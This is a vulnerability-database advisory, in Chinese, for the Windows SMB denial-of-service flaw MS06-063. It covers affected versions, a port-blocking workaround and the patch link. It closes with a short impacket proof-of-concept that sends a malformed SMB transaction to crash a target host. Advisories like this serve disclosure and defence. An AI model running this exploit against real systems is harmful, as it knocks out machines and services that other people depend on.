Microsoft Windows SMB畸形管道请求处理远程拒绝服务漏洞(MS06-063)

2006-10-25T00:00:00
ID SSV:144
Type seebug
Reporter Root
Modified 2006-10-25T00:00:00

Description

Microsoft Windows是微软发布的非常流行的操作系统。

Windows的Server驱动(srv.sys)在处理某些SMB数据时存在空指针引用错误,远程攻击者可能利用此漏洞导致Windows系统崩溃死机。

如果远程攻击者向有漏洞的系统发送了包含有非正常终止的SMB_COM_TRANSACTION SMB消息(0x25)的话,就可能导致蓝屏死机。目前已有公开的攻击代码。

Microsoft Windows XP SP2 Microsoft Windows XP SP1 Microsoft Windows XP Microsoft Windows Server 2003 SP1 Microsoft Windows Server 2003 Microsoft Windows 2000SP4 临时解决方法:

  • 在边界防火墙上阻断TCP端口139和445上的入站和出站通讯。

厂商补丁:

Microsoft

Microsoft已经为此发布了一个安全公告(MS06-063)以及相应补丁: MS06-063:Vulnerability in Server Service Could Allow Denial of Service and Remote Code Execution (923414) 链接:http://www.microsoft.com/technet/security/Bulletin/MS06-063.mspx

                                        
                                            
                                                from impacket import smb

s = smb.SMB('*SMBSERVER','10.0.1.44')
s.login('','')
tid = s.tree_connect_andx(r'\\*SMBSERVER\IPC$')
s.send_trans(tid, '\x01\x00\x00\x00\x00\x00', 'cuchicuchi','','')